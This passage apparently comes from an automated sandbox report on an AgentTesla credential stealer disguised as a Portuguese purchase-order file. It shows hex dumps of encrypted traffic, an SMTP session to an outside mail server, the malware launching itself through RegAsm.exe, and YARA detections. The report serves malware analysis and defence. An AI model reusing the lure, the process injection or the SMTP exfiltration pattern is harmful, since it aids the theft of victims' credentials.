21 8e eb 42 ff 86 23 65
                                        Data Ascii: v1tbLTzcCSckXb<{hzqr75.vaEGXEQiDQ*`+r63qpGl@Sn<p&zF%k>8Ijp=&m~KOh+#D@yMeaa GLv nA*@$f\5/+.dhyx5#Umzre4H'!B#e
                                        2021-09-27 17:14:38 UTC210INData Raw: c1 7f 2a 14 ae ff c5 de 14 94 da 82 96 83 d7 cb ed ae d3 f2 f3 3f 50 0e f7 13 1d 29 9e 0f 03 12 2a 75 49 39 17 4b 15 cf ac fa 38 6f c7 6d d0 cb 9c 5f 4f f1 38 7a 51 8f ef 08 dc b3 4f 98 87 5a ad a9 f6 b4 cb b5 b2 ae 19 fb e7 6c 0f 8b 18 eb b1 6b 7e 9e 7c 08 2f 94 69 74 d9 a6 e3 f0 6f 46 d5 1f dc ad de 49 36 77 a4 d0 25 19 7f 1c 07 ca 75 c0 cd 53 f5 4b 73 e2 97 39 9f b4 b6 75 cb 9d b1 e9 8d 39 90 72 ad a8 e2 23 81 2f 0a 09 97 6c 3c e3 4b 53 bc e7 18 0f 75 cf af 08 31 33 54 5e f8 c2 0a ab 2c 43 da 12 67 dc 2f 9d 01 5a 8a ab bf 71 ea 07 e4 b0 6e fd 2b f6 70 9c fa d5 e2 41 72 c9 37 ef d9 9e a2 e3 4c 8f f0 09 74 74 d4 d3 1d 14 48 37 97 26 ef b3 9a 9d 6e a7 19 e7 62 43 d9 3c 94 79 a7 cd 45 63 f3 b3 2f 0c 7b c6 6a f9 c7 41 2f 45 28 fd 08 81 07 4d ba 04 21 ca 0b
                                        Data Ascii: *?P)*uI9K8om_O8zQOZlk~|/itoFI6w%uSKs9u9r#/l<KSu13T^,Cg/Zqn+pAr7LttH7&nbC<yEc/{jA/E(M!
                                        2021-09-27 17:14:38 UTC211INData Raw: 4c 98 af b8 69 9e 4d 24 5f a8 2d fa 4e 3e 83 91 d7 1d 19 9d 7e b3 dc 8e d6 ca 28 b2 d1 54 b3 fd c8 58 26 40 f5 39 e4 ae 71 93 e8 33 a9 de f8 e3 93 d7 bf c3 df 1f 09 c0 47 9d 71 b9 59 42 9e 5b 0d 0c b2 d7 d5 51 00 f3 60 5e ef a0 c3 f2 0a 80 83 30 51 6a 4e fe fa a6 7b 7d 23 6d 33 15 a1 62 af 2f 15 ab e1 31 aa 4a 2b c9 f7 0c 19 79 0e d4 c6 66 8e 0d d6 ab 18 0c f6 45 40 9c a6 85 e8 21 86 ac c6 96 24 66 b3 bc ea e3 2d 15 1a 80 16 d7 e3 7d 72 9c f3 8f 19 48 aa 71 2e 09 4d 8f a5 3c fb 2e 7e a3 5b 18 38 48 f8 d1 b3 5b e6 cf 5c 8b a0 58 0a f2 a9 0d 0a f1 7f 38 e0 1b 89 4e a2 8b 16 ab d1 c8 35 b7 40 b4 9a f4 36 a3 12 aa d5 cd c0 8c 11 ba e0 45 23 01 d2 14 1f 65 03 cf a6 6c e1 bb ed a8 0b 7e 16 32 ec 33 79 49 5b 86 94 08 a5 8a 4c 65 dd 46 78 7a 8c c8 ad 42 28 02 8e
                                        Data Ascii: LiM$_-N>~(TX&@9q3GqYB[Q`^0QjN{}#m3b/1J+yfE@!$f-}rHq.M<.~[8H[\X8N5@6E#el~23yI[LeFxzB(
                                        2021-09-27 17:14:38 UTC212INData Raw: 3a 70 1e ec a4 10 d6 5b f0 cd b9 22 92 64 04 f1 8a 30 79 d1 5d 20 03 48 aa 3f 4b c0 7f c9 7b f1 bd 75 73 62 e8 ee c8 bc c0 8d 5e 18 3c 38 26 83 12 f7 13 ed c0 c4 21 4f 48 ca 07 af db 59 a4 2d 3f 51 32 01 fe 0a 89 0e 2b a2 62 d3 65 23 d8 3b 04 3d 43 60 0c eb c0 c5 f4 b6 1f c3 d9 f3 56 c2 08 35 bd 17 ad 43 58 5c c2 85 71 37 4d 59 43 63 09 0c 2d 8c 8e 69 a5 20 3e 09 bc 6d 2a b3 82 b7 66 e4 5d 07 d7 1f 4e c4 29 59 09 33 d8 4f a7 dc f6 0d d0 0a 82 6a d8 11 cc 97 c9 98 c1 0c 13 10 6b d6 51 0c 24 ed 54 a5 93 ba ac 6f e1 06 44 26 57 99 56 33 dc dc 0e ab f5 9d 48 3d 77 3c e4 df f0 9f 35 d8 57 43 53 7e 33 cd 08 b5 25 93 ac 22 4b e4 72 d9 9a 75 0c b9 08 df 78 b8 b6 54 32 89 30 80 f5 c1 42 33 3d 93 07 99 6c eb 51 06 b5 15 f5 df b3 13 e6 a6 93 a4 5e cb 51 c4 bd 60 7c
                                        Data Ascii: :p["d0y] H?K{usb^<8&!OHY-?Q2+be#;=C`V5CX\q7MYCc-i >m*f]N)Y3OjkQ$ToD&WV3H=w<5WCS~3%"KruxT20B3=lQ^Q`|
                                        2021-09-27 17:14:38 UTC214INData Raw: 51 9c 8f a3 0f 30 ff c4 3e 07 45 0e d3 25 7f 28 f3 8a e5 70 cf d7 5f 54 f2 3b ae 56 9a fe 87 96 b8 49 92 85 55 a0 bd e7 a6 4b 22 b0 a8 17 ed 67 e1 14 91 91 7c b8 7e f9 d6 7c 13 35 1d 25 60 d0 a3 f4 f0 87 cd bd 03 a8 b1 aa 55 51 6b d0 cc 44 16 18 06 73 d6 14 d6 a4 41 81 57 3d f7 f5 3e e4 27 46 66 b0 0e 98 ee f6 aa 60 61 d6 3b cb 3f fa be 72 09 7d 6b 47 6e 5c 4f 33 a9 04 68 6f bb b3 73 a2 fb 43 17 ea b9 9b d7 38 0a c9 69 f6 ac 35 f2 33 32 8a 41 b0 16 d1 69 f9 cc 6e fd f2 e5 0b 0f d3 d2 ad d2 6a 69 38 60 8c 9d 4e 5b 43 8f 18 47 77 98 f0 de 15 03 c7 bc 17 74 60 e1 f5 95 72 a7 01 76 ca 47 cd 3e 08 fe a6 cb 4b 7c e0 37 ba 0a 66 da e5 b3 d9 41 2f 4f 3d e6 12 0a 44 48 a9 04 2d cd 23 f4 cb 7d 7e d4 9f 7d 69 fb 00 b5 3a b3 94 51 bf 2a e3 e4 0e 1a 79 67 6b 02 71 33
                                        Data Ascii: Q0>E%(p_T;VIUK"g|~|5%`UQkDsAW=>'Ff`a;?r}kGn\O3hosC8i532Ainji8`N[CGwt`rvG>K|7fA/O=DH-#}~}i:Q*ygkq3
                                        2021-09-27 17:14:38 UTC215INData Raw: 36 83 c4 ca ee d8 57 a2 c4 f1 39 e7 fb 62 98 f4 a0 80 d7 cd f0 10 75 bd de cb 00 8b cb 50 81 fd a5 4a ce 21 44 06 1f be d9 d7 5a 0f 77 f7 4b e2 a0 cd d4 0b 90 08 b0 57 68 45 f8 f7 ba 6c e2 23 69 29 9f a2 68 a7 2f 08 af f4 7d b0 58 22 dc 66 89 04 79 0f 00 cf 68 13 85 56 90 84 49 ff 4a c4 18 bb 8d e6 bd c0 b3 d5 84 22 75 a1 3c 62 63 01 09 9d c4 14 cb 6d e7 74 8b f6 90 09 38 b3 6b bf 58 c5 0e ba 20 fd 3a 73 a8 57 04 b1 18 f8 c9 b3 56 e0 c2 4e 8e be 4d 83 65 a0 0a 71 7e 35 33 e6 1b 8e 41 b2 8b 17 36 dc ce 33 b1 56 b3 92 f4 dd 9e 1b bf 55 fe c0 87 11 b1 f7 40 2f 01 d9 12 1b 4d 17 45 f6 64 ee bb fe b1 1e 6a 0c 2a ff 23 08 4f 41 ea 92 0a b8 96 3b 71 df 4a 76 65 90 a3 d8 4d a8 42 a0 f0 c8 c0 17 9a 47 aa 98 1d 94 df 84 b3 cf e8 cf 3c 55 1c 75 40 07 18 8f 12 10 87
                                        Data Ascii: 6W9buPJ!DZwKWhEl#i)h/}X"fyhVIJ"u<bcmt8kX :sWVNMeq~53A63VU@/MEdj*#OA;qJveMBG<Uu@
                                        2021-09-27 17:14:38 UTC216INData Raw: db fe 8b 61 89 36 e9 6c e9 63 e8 cb ac 4a 55 c1 88 b5 f5 38 94 b0 f2 13 ef 54 db a3 49 59 c5 97 b6 76 4f 25 6c 3a 43 3a 0d 93 0d f7 8d cd bb 0c c7 09 28 b7 33 1e 27 5a ee b5 e6 c1 ca f4 ae 97 6a cc f1 43 a3 12 bc 14 14 90 50 d9 fa d7 1a b1 bc e9 5e 5e 67 1a 02 34 a9 9e e9 77 27 3e 0d af 6c 27 ac 8f a2 7f f0 5d 01 cd 82 ee cb 5c 59 0e 3c df 4a ac c9 fd 18 dd 11 80 4c cf 0d 45 00 c2 91 d2 02 8f 87 77 d6 57 0c 31 ea 5b af 8e be a4 78 72 1f b4 02 5e 0e c3 0a 5d 68 0f 89 74 ec 50 01 6b 1d 89 e3 fe b7 30 fc d6 34 5b 54 5e e6 88 40 2b cc a9 69 43 b2 1b 94 87 3d 04 f6 00 9f 7d d1 b4 1f 2a c0 3b cc f0 84 5a 73 35 d4 17 db ec 0e 58 74 b7 47 e4 08 22 57 65 65 9f f2 5e 90 51 9d bd 3b 7c 83 48 2a 42 a1 3e 78 40 2c 01 9c c8 18 04 98 63 b6 cf 8b de cc 27 37 77 d8 a6 f0
                                        Data Ascii: a6lcJU8TIYvO%l:C:(3'ZjCP^^g4w'>l']\Y<JLEwW1[xr^]htPk04[T^@+iC=}*;Zs5XtG"Wee^Q;|H*B>x@,c'7w
                                        2021-09-27 17:14:38 UTC217INData Raw: 70 9a e8 9b 19 29 40 84 05 b8 af b2 e4 a4 44 2e af bd 0b f4 7a ec 18 9e 99 70 b1 77 ee 5f 4b 1a 1d 17 2f 65 57 44 ef eb 26 56 be 1f 35 53 a5 db 8a 69 ca c4 51 0e 1c 0c 7c 58 c9 cf a1 49 9b 79 18 fa f4 3a 75 77 d5 47 a1 8e ca 7b 31 3a 7a b9 c6 bf 8b 33 e2 37 69 1c f9 7d 57 ef 57 dc 87 e0 36 03 65 b4 3d 8d 33 47 43 2c ed ac 0d d0 bf b3 c9 69 f5 59 3f fa 1d 21 18 26 bf 98 14 7b e7 58 d9 7d 79 64 f5 86 86 d6 3e f6 f2 7a aa 0d c3 8f 21 44 5d 8f f1 ad 70 e7 6c 42 09 14 49 42 9e 33 6b ee 99 9a 68 a0 00 62 eb 44 c5 27 1b e7 a1 de 4d 64 60 47 ab 08 69 de f6 b8 cc 4a 21 46 3d ed 1d 05 43 4f a9 0f 2a c5 0b e8 c4 67 dc 3f 9b 6f 7c 67 9c a9 2d 20 55 31 b0 ae 7d f8 19 93 3d 7d 67 05 65 39 31 d9 47 e8 47 27 26 8a f8 41 ed 05 4b 76 54 f5 2b 11 20 bf 27 44 d7 de 8b 68 92
                                        Data Ascii: p)@D.zpw_K/eWD&V5SiQ|XIy:uwG{1:z37i}WW6e=3GC,iY?!&{X}yd>z!D]plBIB3khbD'Md`GiJ!F=CO*g?o|g- U1}=}ge91GG'&AKvT+ 'Dh
                                        2021-09-27 17:14:38 UTC219INData Raw: 14 c7 50 9f f4 b8 47 51 95 5b 14 0c ab c3 ce 49 01 eb 6f 4b ee ae d9 70 0b 87 89 2d 46 e6 43 f8 f8 a5 74 fa 34 0e 2b b7 a7 75 a0 34 10 b7 f9 29 b2 45 30 c8 fa 15 18 6e 80 48 d2 72 98 1c 54 87 0b 18 6e 5d 57 05 b3 93 f3 3a 8a a2 5a 17 29 68 ae b8 f3 6a 13 18 01 85 0a c0 71 80 74 91 f0 91 1e 47 2b 74 36 10 ca 10 a9 39 e1 a4 7f a5 52 11 3c 45 f5 dc be 56 eb c2 57 9e ae 42 07 e1 a4 02 66 e2 74 2d ed 1d 92 20 ab 99 92 6f da dd 38 a2 40 a9 9e fb 5a b9 12 aa cb c6 c0 87 11 b1 f7 40 35 9d cc 08 95 7c 00 24 e5 61 e3 ae e6 a9 13 7f 0e 33 f4 2c 74 5c 56 d6 93 2c a4 81 5f 69 c7 47 6a 75 03 da d9 5a 36 02 b2 e5 4d 7e 05 08 66 8d 0b 96 c5 d1 f1 b1 d3 f2 f3 2f 3d 1c 77 11 13 b8 72 12 10 86 30 e9 c1 2a 88 43 12 5c 25 79 24 74 db ff 19 d1 c3 4c 46 fe a5 fe 4c 87 e1 94 84
                                        Data Ascii: PGQ[IoKp-FCt4+u4)E0nHrTn]W:Z)hjqtG+t69R<EVWBft- o8@Z@5|$a3,t\V,_iGjuZ6M~f/=wr0*C\%y$tLFL
                                        2021-09-27 17:14:38 UTC220INData Raw: 21 4c 5d d9 86 37 da 4b 25 05 31 5f bc 0d 92 0a e6 0e 4c a2 0b d3 0b 23 ab 3b 16 3b 4b 6e 11 ee dd 40 e8 a4 9d 76 c4 f6 44 ab 1a b4 1c 10 8d 41 59 52 d3 06 a0 3c 4d 5a 5e f6 14 09 30 29 1f e8 7c 8f 3b 00 b2 70 2f ae 87 aa 63 f8 40 62 46 9c f2 3c 41 44 0c 34 d8 4d a9 c1 f3 10 d5 a5 87 58 cd 03 4d 58 c8 c5 d4 41 92 df 6a 9d 5f 56 39 b0 5c e5 93 f4 b9 33 60 c0 45 61 59 57 d6 5e dc be 0e 9b f5 ac 48 b2 73 e0 1a eb f0 ab 35 ee 57 74 53 46 33 f4 08 f4 25 d1 ac 61 4b a0 72 a3 9a 33 0c fe 08 97 78 f5 b6 1e 32 c3 30 cc f5 8c 42 7d 3d dc 07 c9 6c ba 51 54 b5 02 f5 8b b3 47 e6 a6 93 92 5e e1 51 db bd 53 7c ef 48 4f 42 e4 3f 16 43 4a 01 f3 ca 18 04 98 63 92 c1 8f d8 c4 35 e3 c3 a4 ae 81 cd 2b 23 2e f0 47 66 da 6c e2 e6 48 c0 b6 d8 8f 92 c4 bf d0 de 12 09 72 56 93 f1
                                        Data Ascii: !L]7K%1_L#;;Kn@vDAYR<MZ^0)|;p/c@bF<AD4MXMXAj_V9\3`EaYW^Hs5WtSF3%aKr3x20B}=lQTG^QS|HOB?CJc5+#.GflHrV
                                        2021-09-27 17:14:38 UTC221INData Raw: 79 ff de 72 1d 3d 15 2d 77 d7 a8 e1 e2 06 54 bc 0d b5 bf b7 5b 5f 65 cd c2 4c 0b 16 0e 6e d8 1c d2 a4 41 9c 59 1a f0 fe 2b f6 a6 df 67 a2 8f d8 fb e4 2b f9 60 c4 ba 8b 31 e8 3d 63 1b fe 7e 55 ed 45 5d b2 e9 16 01 67 a6 bd 61 23 5a 46 37 ea ab 18 c2 3e 2a c8 7b 75 b5 3d f4 13 33 98 c2 ad 18 f8 6e f6 d9 7c 7c 6b e4 19 8e 93 c7 bf 53 f3 68 2a e1 cc 8f 23 46 4d 9d 71 49 65 f5 ed db 08 06 c9 ae 96 34 6e f3 9c 9d 6f a9 08 66 cb 45 cc 2e 15 e0 a6 c3 48 76 e1 32 b6 0d 6e d4 eb bd c4 4f 21 47 20 e8 1a 70 40 4e b8 0a 23 c3 7b df c5 75 5c d3 94 68 7b 7a 99 b4 28 32 d4 44 ad ab 7a e5 1c 9b 39 7a 65 0c 6d 3d 11 d8 4e e2 4c 20 23 80 e5 44 ff 84 3e 6b 51 fd 2e 11 21 a2 22 4e d2 fe 89 69 98 b5 68 7d 6a e2 ee cb ad 42 44 42 09 be f5 3a 86 32 f7 01 6d 51 c9 21 4c 5d d8 86
                                        Data Ascii: yr=-wT[_eLnAY+g+`1=c~UE]ga#ZF7>*{u=3n||kSh*#FMqIe4nofE.Hv2nO!G p@N#{u\h{z(2Dz9zem=NL #D>kQ.!"Nih}jBDB:2mQ!L]


                                        SMTP Packets

                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Sep 27, 2021 19:16:13.439222097 CEST58749778109.169.39.245192.168.11.20220-s3.xperimenta.net ESMTP Exim 4.91 #1 Mon, 27 Sep 2021 19:16:13 +0200
                                        220-We do not authorize the use of this system to transport unsolicited,
                                        220 and/or bulk e-mail.
                                        Sep 27, 2021 19:16:13.439776897 CEST49778587192.168.11.20109.169.39.245EHLO 849224
                                        Sep 27, 2021 19:16:13.459146023 CEST58749778109.169.39.245192.168.11.20250-s3.xperimenta.net Hello 849224 [84.17.52.54]
                                        250-SIZE 94371840
                                        250-8BITMIME
                                        250-PIPELINING
                                        250-AUTH PLAIN LOGIN
                                        250-STARTTLS
                                        250 HELP
                                        Sep 27, 2021 19:16:13.459445953 CEST49778587192.168.11.20109.169.39.245STARTTLS
                                        Sep 27, 2021 19:16:13.481628895 CEST58749778109.169.39.245192.168.11.20220 TLS go ahead

                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:19:13:48
                                        Start date:27/09/2021
                                        Path:C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
                                        Imagebase:0x400000
                                        File size:90112 bytes
                                        MD5 hash:943986D4CB51D4CC29946AA7914DBC5B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Visual Basic
                                        Reputation:low

                                        General

                                        Start time:19:14:12
                                        Start date:27/09/2021
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
                                        Imagebase:0x1a0000
                                        File size:65440 bytes
                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:19:14:12
                                        Start date:27/09/2021
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
                                        Imagebase:0x650000
                                        File size:65440 bytes
                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Start time:19:14:12
                                        Start date:27/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff654f70000
                                        File size:875008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:19:19:29
                                        Start date:27/09/2021
                                        Path:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe' /q WD
                                        Imagebase:0x7ff7e3a70000
                                        File size:13398464 bytes
                                        MD5 hash:FDAE491F6414B619270DD128A4000BAB
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:19:19:31
                                        Start date:27/09/2021
                                        Path:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1503.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe /q WD
                                        Imagebase:0x7ff6578f0000
                                        File size:803176 bytes
                                        MD5 hash:01F92DC7A766FF783AE7AF40FD0334FB
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Reputation:low

                                        General

                                        Start time:19:19:33
                                        Start date:27/09/2021
                                        Path:C:\Windows\System32\wevtutil.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man
                                        Imagebase:0x7ff77e4d0000
                                        File size:291840 bytes
                                        MD5 hash:C57C1292650B6384903FE6408D412CFA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:19:19:33
                                        Start date:27/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff654f70000
                                        File size:875008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:19:19:34
                                        Start date:27/09/2021
                                        Path:C:\Windows\System32\wevtutil.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
                                        Imagebase:0x7ff77e4d0000
                                        File size:291840 bytes
                                        MD5 hash:C57C1292650B6384903FE6408D412CFA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:19:19:34
                                        Start date:27/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff654f70000
                                        File size:875008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Disassembly

                                        Code Analysis

                                        Reset < >